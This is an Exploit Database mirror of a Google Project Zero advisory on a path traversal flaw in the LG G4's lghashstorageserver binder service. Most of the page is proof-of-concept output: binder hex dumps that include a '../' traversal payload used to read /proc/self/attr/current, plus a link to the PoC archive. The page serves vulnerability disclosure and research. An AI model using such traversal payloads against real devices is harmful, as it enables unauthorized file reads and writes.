LG G4 – lghashstorageserver Directory Traversal

• Exploit Database
• 20 阅读

• 作者： Google Security Research
  日期： 2017-02-14
• 类别：

  • dos
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/41352/

• Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=987
  
  The lghashstorageserver binder service (/system/bin/lghashstorageserver) 
  implementation on the LG G4 is vulnerable to path traversal, allowing an
  app to read and write 0x20 bytes from any file in the context of the
  lghashstorageserver.
  
  See attached for a PoC which reads from /proc/self/attr/current for the 
  lghashstorageserver.
  
  [0] opening /dev/binder
  [0] looking up service lghashstorage
  0000: 00 . 01 . 00 . 00 . 1a . 00 . 00 . 00 . 61 a 00 . 6e n 00 . 64 d 00 . 72 r 00 .
  0016: 6f o 00 . 69 i 00 . 64 d 00 . 2e . 00 . 6f o 00 . 73 s 00 . 2e . 00 . 49 I 00 .
  0032: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 4d M 00 .
  0048: 61 a 00 . 6e n 00 . 61 a 00 . 67 g 00 . 65 e 00 . 72 r 00 . 00 . 00 . 00 . 00 .
  0064: 0d . 00 . 00 . 00 . 6c l 00 . 67 g 00 . 68 h 00 . 61 a 00 . 73 s 00 . 68 h 00 .
  0080: 73 s 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 . 00 . 00 .
  BR_NOOP:
  BR_TRANSACTION_COMPLETE:
  BR_NOOP:
  BR_REPLY:
  target 0000000000000000cookie 0000000000000000code 00000000flags 00000000
  pid0uid 1000data 24offs 8
  0000: 85 . 2a * 68 h 73 s 7f . 01 . 00 . 00 . 01 . 00 . 00 . 00 . 55 U 00 . 00 . 00 .
  0016: 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
  - type 73682a85flags 0000017fptr 0000005500000001cookie 0000000000000000
  [0] got handle 00000001
  [0] reading hash
  0000: 00 . 01 . 00 . 00 . 1b . 00 . 00 . 00 . 63 c 00 . 6f o 00 . 6d m 00 . 2e . 00 .
  0016: 6c l 00 . 67 g 00 . 65 e 00 . 2e . 00 . 49 I 00 . 48 H 00 . 61 a 00 . 73 s 00 .
  0032: 68 h 00 . 53 S 00 . 74 t 00 . 6f o 00 . 72 r 00 . 61 a 00 . 67 g 00 . 65 e 00 .
  0048: 53 S 00 . 65 e 00 . 72 r 00 . 76 v 00 . 69 i 00 . 63 c 00 . 65 e 00 . 00 . 00 .
  0064: 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e . 2e . 2f / 2e .
  0080: 2e . 2f / 2e . 2e . 2f / 70 p 72 r 6f o 63 c 2f / 73 s 65 e 6c l 66 f 2f / 61 a
  0096: 74 t 74 t 72 r 2f / 63 c 75 u 72 r 72 r 65 e 6e n 74 t 00 . 00 . 00 . 00 . 00 .
  BR_NOOP:
  BR_TRANSACTION_COMPLETE:
  BR_NOOP:
  BR_REPLY:
  target 0000000000000000cookie 0000000000000000code 00000000flags 00000000
  pid0uid 1000data 36offs 0
  0000: 75 u 3a : 72 r 3a : 6c l 67 g 68 h 61 a 73 s 68 h 73 s 74 t 6f o 72 r 61 a 67 g
  0016: 65 e 73 s 65 e 72 r 76 v 65 e 72 r 3a : 73 s 30 0 00 . 00 . 00 . 00 . 00 . 00 .
  0032: 00 . 00 . 00 . 00 .
  u:r:lghashstorageserver:s0
  
  
  Proof of Concept:
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41352.zip